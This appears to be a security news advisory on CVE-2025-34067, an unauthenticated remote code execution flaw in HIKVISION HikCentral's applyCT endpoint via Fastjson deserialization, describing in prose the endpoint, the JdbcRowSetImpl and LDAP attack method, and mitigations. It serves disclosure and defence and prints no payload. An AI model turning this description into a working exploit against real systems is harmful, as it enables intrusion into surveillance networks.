“`html

A significant security flaw has been identified within HIKVISION’s applyCT component, part of the HikCentral Integrated Security Management Platform, enabling attackers to execute arbitrary code remotely without the need for authentication.

Designated CVE-2025-34067 with a peak CVSS score of 10.0, this vulnerability arises from the platform’s reliance on a susceptible version of the Fastjson library, endangering millions of surveillance devices globally to potential exploitation.

Key Takeaways
1. CVE-2025-34067 (CVSS 10.0) in HIKVISION applyCT permits unauthenticated remote code execution.
2. Exploits the Fastjson library utilizing harmful JSON to the /bic/ssoService/v1/applyCT endpoint via LDAP connections.
3. Impacts HikCentral surveillance systems across governmental, commercial, and industrial domains worldwide.
4. Evaluate deployments immediately, limit network access, and consult HIKVISION for patches - actively exploited.

Critical Fastjson Deserialization Defect

This vulnerability takes advantage of the /bic/ssoService/v1/applyCT endpoint through harmful JSON payloads that are processed by the Fastjson library.

Intruders can construct specific JSON requests that activate Fastjson’s auto-type capability, facilitating the loading of arbitrary Java classes.

The attack strategy involves manipulating the JdbcRowSetImpl class to form connections with untrusted LDAP servers, effectively bypassing security measures.

The exploit necessitates sending a POST request with Content-Type: application/json to the compromised endpoint. By altering the datasource parameter to reference a malicious LDAP server, attackers can gain remote code execution on the underlying system.

This exemplifies a classic case of CWE-502 Deserialization of Untrusted Data combined with CWE-917 Expression Language Injection, where inadequate input validation permits unauthorized class loading and code execution.

The vulnerability influences the HikCentral platform, formerly recognized as the “Integrated Security Management Platform,” offering a comprehensive security management solution extensively deployed across governmental, commercial, and industrial sectors.

The platform’s broad usage amplifies the gravity of this vulnerability, as it provides centralized control over multiple security devices and surveillance systems.

Potential ramifications include unauthorized access to sensitive surveillance information, tampering with security systems, and the likelihood of lateral movement within network infrastructure.

Entities utilizing affected HIKVISION applyCT systems face threats of data breaches, service interruptions, and potential compromise of their overall security architecture.

The unverified nature of the vulnerability implies that attackers can exploit it without valid credentials, considerably lowering the obstacles for malicious actors.

This has resulted in its designation as a known-exploited-vulnerability, signifying ongoing exploitation in real-world scenarios.

Risk Factors Details
Affected Products – HIKVISION HikCentral (formerly “Integrated Security Management Platform”)- applyCT component- Versions utilizing the vulnerable Fastjson library
Impact Remote Code Execution (RCE)
Exploit Prerequisites – Network access to /bic/ssoService/v1/applyCT endpoint- Capability to send HTTP POST requests- No authentication required- Access to a malicious LDAP server
CVSS Score 10.0 (Critical)

Mitigations

Organizations ought to promptly evaluate their HIKVISION applyCT deployments and implement network segmentation to minimize exposure.

Monitoring for abnormal network activity directed at the /bic/ssoService/v1/applyCT endpoint can assist in identifying attempted exploits.

While specific patches have not been outlined in current advisories, users should reach out to HIKVISION support for immediate remediation advice and consider temporarily restricting access to the vulnerable endpoint until patches are provided.

Security teams should also enforce additional scrutiny for LDAP connection attempts from their HIKVISION systems and think about deploying network-based intrusion detection systems to recognize potential exploitation attempts targeting this critical vulnerability.

“`